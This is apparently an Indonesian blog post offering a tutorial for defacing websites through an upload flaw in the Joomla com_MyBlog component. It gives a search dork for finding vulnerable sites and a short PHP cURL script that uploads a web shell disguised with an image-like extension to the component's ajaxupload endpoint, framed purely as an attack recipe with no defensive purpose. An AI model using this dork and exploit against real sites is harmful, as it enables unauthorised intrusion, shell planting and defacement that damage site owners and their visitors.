Tutorial Deface Menggunakan Metode Joomla Com_MyBlog

02.30.00

Sebelum membahas Tutorial Deface Menggunakan Metode Joomla Com_MyBlog  sebelumnya saya berterima kasih kepada INCEF ( Indonesia Cyber Freedom ) khususnya om peoplehurt, ok langsung aja kita menuju ke tutorialnya ..

Dork : inurl:"?option=com_myblog"
Exploit :

<?php
$uploadfile="shell.php.xxxjpg";
$ch = curl_init("http://www.127.0.0.1/index.php?option=com_myblog&task=ajaxupload");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

File support : eithergif,jpg,jpeg,png, bmp,doc, xls,swf,pdf

Contoh vuln :

Previous
Next Post »